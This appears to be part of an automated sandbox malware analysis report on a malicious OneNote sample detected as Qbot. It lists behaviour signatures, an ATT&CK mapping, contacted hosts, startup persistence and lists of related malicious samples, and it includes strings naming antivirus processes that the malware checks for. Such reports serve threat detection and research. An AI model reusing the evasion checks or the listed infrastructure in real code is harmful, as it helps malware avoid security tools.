Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,	14_2_10002C5E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,	14_2_10012137
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,	14_2_1000338F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,	14_2_1000FFF2

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_69372030 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

14_2_69372030

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_1000B231 GetCurrentProcessId,GetLastError,GetVersionExA,GetWindowsDirectoryW,

14_2_1000B231

Source: C:\Windows\SysWOW64\backgroundTaskHost.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Source: rundll32.exe, 0000000E.00000003.33835079957.0000000004A1F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bdagent.exe
Source: rundll32.exe, 0000000E.00000003.33835079957.0000000004A1F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vsserv.exe
Source: rundll32.exe, 0000000E.00000003.33835079957.0000000004A1F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avp.exe
Source: rundll32.exe, 0000000E.00000003.33835079957.0000000004A1F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avgcsrvx.exe
Source: rundll32.exe, 0000000E.00000003.33835079957.0000000004A1F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: mcshield.exe
Source: rundll32.exe, 0000000E.00000003.33835079957.0000000004A1F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Qbot

Source: Yara match	File source: 14.2.rundll32.exe.2fbd640.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.10000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.2fbd640.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.33862410772.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Gathers network related connection and port information

Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE netstat -nao
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE netstat -nao			Jump to behavior

Remote Access Functionality

Yara detected Qbot

Source: Yara match	File source: 14.2.rundll32.exe.2fbd640.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.10000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.2fbd640.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.33862410772.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	431 Windows Management Instrumentation	11 DLL Side-Loading	11 DLL Side-Loading	1 Obfuscated Files or Information	1 Credential API Hooking	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	2 Native API	1 Windows Service	1 Windows Service	1 Software Packing	LSASS Memory	2 System Network Connections Discovery	Remote Desktop Protocol	1 Credential API Hooking	Exfiltration Over Bluetooth	11 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Exploitation for Client Execution	2 Registry Run Keys / Startup Folder	311 Process Injection	1 Timestomp	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	1 Command and Scripting Interpreter	Logon Script (Mac)	2 Registry Run Keys / Startup Folder	11 DLL Side-Loading	NTDS	436 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	2 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	1 Service Execution	Network Logon Script	Network Logon Script	11 Masquerading	LSA Secrets	541 Security Software Discovery	SSH	Keylogging	Data Transfer Size Limits	13 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	2 PowerShell	Rc.common	Rc.common	341 Virtualization/Sandbox Evasion	Cached Domain Credentials	341 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	311 Process Injection	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 Rundll32	Proc Filesystem	1 Application Window Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	1 Remote System Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	4 System Network Configuration Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

⊘No Antivirus matches

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\76d4c8d1.dll	2%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
starcomputadoras.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://api.aadrm.com/	0%	Avira URL Cloud	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	Avira URL Cloud	safe
https://cdn.entity.	0%	Avira URL Cloud	safe
https://officeci.azurewebsites.net/api/	0%	Avira URL Cloud	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	Avira URL Cloud	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	Virustotal		Browse
https://officeci.azurewebsites.net/api/	0%	Virustotal		Browse
https://api.aadrm.com/	0%	Virustotal		Browse
https://store.office.cn/addinstemplate	0%	Avira URL Cloud	safe
https://my.microsoftpersonalcontent.com	0%	Avira URL Cloud	safe
https://www.odwebp.svc.ms	0%	Avira URL Cloud	safe
https://api.addins.store.officeppe.com/addinstemplate	0%	Avira URL Cloud	safe
https://d.docs.live.net	0%	Avira URL Cloud	safe
https://ncus.contentsync.	0%	Avira URL Cloud	safe
https://wus2.contentsync.	0%	Avira URL Cloud	safe
https://skyapi.live.net/Activity/	0%	Avira URL Cloud	safe
https://api.cortana.ai	0%	Avira URL Cloud	safe
https://pdx-col.eum-appdynamics.com	0%	Avira URL Cloud	safe
https://staging.cortana.ai	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
starcomputadoras.com	144.217.139.27	true	false	0%, Virustotal, Browse	unknown
cisco.com	72.163.4.185	true	false		high
www.cisco.com	unknown	unknown	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://shell.suite.office.com:1443	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false		high
https://autodiscover-s.outlook.com/	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false		high
https://www.youtube.com/user/cisco	X4QZWFTE.htm.15.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false		high
https://cdn.entity.	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false	Avira URL Cloud: safe	unknown
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false		high
https://www.cisco.com/c/ar_ae/index.html	X4QZWFTE.htm.15.dr	false		high
https://rpsticket.partnerservices.getmicrosoftkey.com	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://lookup.onenote.com/lookup/geolocation/v1	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false		high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false		high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false		high
https://api.aadrm.com/	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.cisco.com/c/hu_hu/index.html	X4QZWFTE.htm.15.dr	false		high
https://www.cisco.com/site/in/en/index.html	X4QZWFTE.htm.15.dr	false		high
https://software.cisco.com/download/navigator.html	X4QZWFTE.htm.15.dr	false		high
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false		high
https://api.microsoftstream.com/api/	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false		high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false		high
https://cr.office.com	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false		high
https://www.cisco.com/c/en/us/partners/connect-with-a-partner.html	X4QZWFTE.htm.15.dr	false		high
https://www.cisco.com/c/en/us/about/sitemap.html	X4QZWFTE.htm.15.dr	false		high
https://learninglocator.cloudapps.cisco.com/#/home	X4QZWFTE.htm.15.dr	false		high
https://www.cisco.com/c/pl_pl/index.html	X4QZWFTE.htm.15.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000009.00000002.33796253441.000001D6539E1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://res.getmicrosoftkey.com/api/redemptionevents	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false	Avira URL Cloud: safe	unknown
https://tasks.office.com	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false		high
https://officeci.azurewebsites.net/api/	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://my.microsoftpersonalcontent.com	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false	Avira URL Cloud: safe	unknown
https://www.cisco.com/site/au/en/index.html	X4QZWFTE.htm.15.dr	false		high
https://store.office.cn/addinstemplate	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false	Avira URL Cloud: safe	unknown
https://www.cisco.com/c/en/us/about/case-studies-customer-success-stories/nfl-superbowl-lvi.html#%7E	X4QZWFTE.htm.15.dr	false		high
https://www.cisco.com/c/es_ec/index.html	X4QZWFTE.htm.15.dr	false		high
https://messaging.engagement.office.com/	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false		high
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false		high
https://www.cisco.com/c/de_de/index.html	X4QZWFTE.htm.15.dr	false		high
https://www.cisco.com/c/en/us/about.html	X4QZWFTE.htm.15.dr	false		high
https://www.odwebp.svc.ms	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false	Avira URL Cloud: safe	unknown
https://api.powerbi.com/v1.0/myorg/groups	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false		high
https://web.microsoftstream.com/video/	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false		high
https://api.addins.store.officeppe.com/addinstemplate	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false	Avira URL Cloud: safe	unknown
https://search.cisco.com/search?query=	X4QZWFTE.htm.15.dr	false		high
http://schema.org/ImageObject	X4QZWFTE.htm.15.dr	false		high
https://graph.windows.net	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false		high
https://www.cisco.com/c/it_it/index.html	X4QZWFTE.htm.15.dr	false		high
https://consent.config.office.com/consentcheckin/v1.0/consents	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false		high
https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false		high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false		high
https://www.cisco.com/c/ja_jp/index.html	X4QZWFTE.htm.15.dr	false		high
https://d.docs.live.net	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false	Avira URL Cloud: safe	unknown
https://ncus.contentsync.	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false	Avira URL Cloud: safe	unknown
https://www.cisco.com/c/en_hk/index.html	X4QZWFTE.htm.15.dr	false		high
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false		high
http://weather.service.msn.com/data.aspx	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false		high
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false		high
https://www.cisco.com/c/da_dk/index.html	X4QZWFTE.htm.15.dr	false		high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false		high
https://pushchannel.1drv.ms	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false		high
https://wus2.contentsync.	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false	Avira URL Cloud: safe	unknown
https://clients.config.office.net/user/v1.0/ios	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false		high
https://o365auditrealtimeingestion.manage.office.com	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false		high
https://outlook.office365.com/api/v1.0/me/Activities	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false		high
https://www.cisco.com/c/es_mx/index.html	X4QZWFTE.htm.15.dr	false		high
https://www.cisco.com/c/fr_be/index.html	X4QZWFTE.htm.15.dr	false		high
https://clients.config.office.net/user/v1.0/android/policies	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false		high
https://www.cisco.com/c/en/us/solutions/enterprise/design-zone/index.html	X4QZWFTE.htm.15.dr	false		high
https://aka.ms/pscore6	powershell.exe, 00000009.00000002.33796253441.000001D653A3A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://entitlement.diagnostics.office.com	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false		high
https://www.cisco.com/c/tr_tr/index.html	X4QZWFTE.htm.15.dr	false		high
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false		high
https://outlook.office.com/	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false		high
https://www.cisco.com/c/no_no/index.html	X4QZWFTE.htm.15.dr	false		high
https://storage.live.com/clientlogs/uploadlocation	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false		high
https://twitter.com/Cisco/	X4QZWFTE.htm.15.dr	false		high
https://www.cisco.com/c/ar_eg/index.html	X4QZWFTE.htm.15.dr	false		high
https://substrate.office.com/search/api/v1/SearchHistory	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false		high
https://www.cisco.com/c/ko_kr/index.html	X4QZWFTE.htm.15.dr	false		high
https://www.cisco.com/c/ro_ro/index.html	X4QZWFTE.htm.15.dr	false		high
https://www.cisco.com/c/es_co/index.html	X4QZWFTE.htm.15.dr	false		high
https://www.cisco.com/c/en/us/about/legal/terms-conditions.html	X4QZWFTE.htm.15.dr	false		high
https://www.cisco.com/c/en/us/buy.html	X4QZWFTE.htm.15.dr	false		high
https://clients.config.office.net/c2r/v1.0/InteractiveInstallation	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false		high
https://www.cisco.com/c/uk_ua/index.html	X4QZWFTE.htm.15.dr	false		high
https://graph.windows.net/	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false		high
https://devnull.onenote.com	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false		high
https://messaging.office.com/	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false		high
https://www.cisco.com/c/fr_fr/index.html	X4QZWFTE.htm.15.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false		high
https://skyapi.live.net/Activity/	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false	Avira URL Cloud: safe	unknown
https://www.cisco.com/c/en/us/training-events/training-certifications.html	X4QZWFTE.htm.15.dr	false		high
https://www.cisco.com/web/fw/i/logo-open-graph.gif	X4QZWFTE.htm.15.dr	false		high
https://api.cortana.ai	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false	Avira URL Cloud: safe	unknown
https://www.cisco.com/c/en_za/index.html	X4QZWFTE.htm.15.dr	false		high
https://pdx-col.eum-appdynamics.com	X4QZWFTE.htm.15.dr	false	Avira URL Cloud: safe	unknown
https://messaging.action.office.com/setcampaignaction	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false		high
https://visio.uservoice.com/forums/368202-visio-on-devices	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false		high
https://staging.cortana.ai	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false	Avira URL Cloud: safe	unknown
https://onedrive.live.com/embed?	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false		high
https://augloop.office.com	064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	false		high
https://www.cisco.com/c/vi_vn/index.html	X4QZWFTE.htm.15.dr	false		high
http://cdn.appdynamics.com	X4QZWFTE.htm.15.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
144.217.139.27	starcomputadoras.com	Canada	16276	OVHFR	false
92.177.204.2	unknown	France	12479	UNI2-ASES	false
72.163.4.185	cisco.com	United States	109	CISCOSYSTEMSUS	false

Private

IP
192.168.11.1

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	800701
Start date and time:	2023-02-07 18:24:30 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Number of analysed new started processes analysed:	41
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	notes.one
Detection:	MAL
Classification:	mal100.spre.troj.spyw.expl.evad.winONE@50/730@3/4
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 19% (good quality ratio 14.6%) Quality average: 64.2% Quality standard deviation: 39.1%
HCA Information:	Successful, ratio: 99% Number of executed functions: 31 Number of non-executed functions: 44
Cookbook Comments:	Found application associated with file extension: .one Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.109.88.191, 52.109.13.64, 52.113.194.132, 20.42.65.90, 95.100.76.145
Excluded domains from analysis (whitelisted): ecs.office.com, self-events-data.trafficmanager.net, client.wns.windows.com, wwwds.cisco.com.edgekey.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, wwwds.cisco.com.edgekey.net.globalredir.akadns.net, onedscolprdeus14.eastus.cloudapp.azure.com, wdcp.microsoft.com, clients.config.office.net, s-0005-office.config.skype.com, prod.nexusrules.live.com.akadns.net, e2867.dsca.akamaiedge.net, ecs-office.s-0005.s-msedge.net, www.cisco.com.akadns.net, wdcpalt.microsoft.com, login.live.com, s-0005.s-msedge.net, config.officeapps.live.com, officeclient.microsoft.com, ecs.office.trafficmanager.net, nexusrules.officeapps.live.com, europe.configsvc1.live.com.akadns.net
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtReadFile calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
18:26:29	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk
18:26:30	API Interceptor	15x Sleep call for process: powershell.exe modified
18:26:42	API Interceptor	9x Sleep call for process: backgroundTaskHost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
144.217.139.27	current productlist.exe	Get hash	malicious	Browse	www.distriautosdelpacifico.com/ehxh/?lZ9D=p2JpVPJHKZml3dvp&kRcDUld=Gy3yvQNjKN14tNIcuu4U0126Gx2ADKTFA6Z+BBy2xx0I4vNEZGpu0pScQZpJJ2M9zzFg6aAH/A==
72.163.4.185	SCANED_HO9225.img	Get hash	malicious	Browse
	pseudobenthosPersuader.img	Get hash	malicious	Browse
	crummy.dll	Get hash	malicious	Browse
	madrid.dll	Get hash	malicious	Browse
	hyperstatic.dll	Get hash	malicious	Browse
	Y0udZLsTNx.dll	Get hash	malicious	Browse
	unwarmed.tmp.dll	Get hash	malicious	Browse
	ketchupRampart.txt.dll	Get hash	malicious	Browse
	watering.dll	Get hash	malicious	Browse
	CVHP01.img	Get hash	malicious	Browse
	CVGU94.img	Get hash	malicious	Browse
	moonlike.dll	Get hash	malicious	Browse
	commiserators.dll	Get hash	malicious	Browse
	totten.dat.dll	Get hash	malicious	Browse
	dour.dat.dll	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
cisco.com	QUOTATION REQUEST - SUPPLY OF PRODUCTS - DTD APRIL 2022.xlsx	Get hash	malicious	Browse	154.196.7.107

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
OVHFR	xakJ7het39.exe	Get hash	malicious	Browse	158.69.96.67
	Cancellation.one	Get hash	malicious	Browse	139.99.8.7
	ePaQLI5RyP.exe	Get hash	malicious	Browse	158.69.96.67
	z3tYlqYItl.exe	Get hash	malicious	Browse	158.69.96.67
	jGQGty5EA2.exe	Get hash	malicious	Browse	158.69.96.67
	90843ec2-5824-4763-b52f-c48fa50dca7c.cmd	Get hash	malicious	Browse	139.99.8.7
	ZJ79K2xku4.exe	Get hash	malicious	Browse	213.186.33.5
	Invoice # W0005588 deposit receipt.rtf	Get hash	malicious	Browse	149.202.81.118
	DJ8SNkLNrG.exe	Get hash	malicious	Browse	46.105.113.84
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	Invoice # W0005588 deposit receipt.exe	Get hash	malicious	Browse	149.202.81.118
	file.exe	Get hash	malicious	Browse	5.135.247.111
	aplicativo.apk	Get hash	malicious	Browse	149.202.76.35
	file.exe	Get hash	malicious	Browse	5.135.247.111
	nUSzL36VtU.xlsx	Get hash	malicious	Browse	144.217.50.248
	nUSzL36VtU.xlsx	Get hash	malicious	Browse	144.217.50.248
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	51.255.34.118
	http://www.leeannchin.com	Get hash	malicious	Browse	51.89.9.253

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	0x000600000001ace8-206.exe	Get hash	malicious	Browse	144.217.139.27
	OR98764357890-098.exe	Get hash	malicious	Browse	144.217.139.27
	PO_72302991PDF.exe	Get hash	malicious	Browse	144.217.139.27
	PO-7654321.exe	Get hash	malicious	Browse	144.217.139.27
	elementrv Remittance.html	Get hash	malicious	Browse	144.217.139.27
	Solicitar Cotizacion.pdf.exe	Get hash	malicious	Browse	144.217.139.27
	item.one	Get hash	malicious	Browse	144.217.139.27
	210909836-042205.exe	Get hash	malicious	Browse	144.217.139.27
	AWB NO. 8148557141.exe	Get hash	malicious	Browse	144.217.139.27
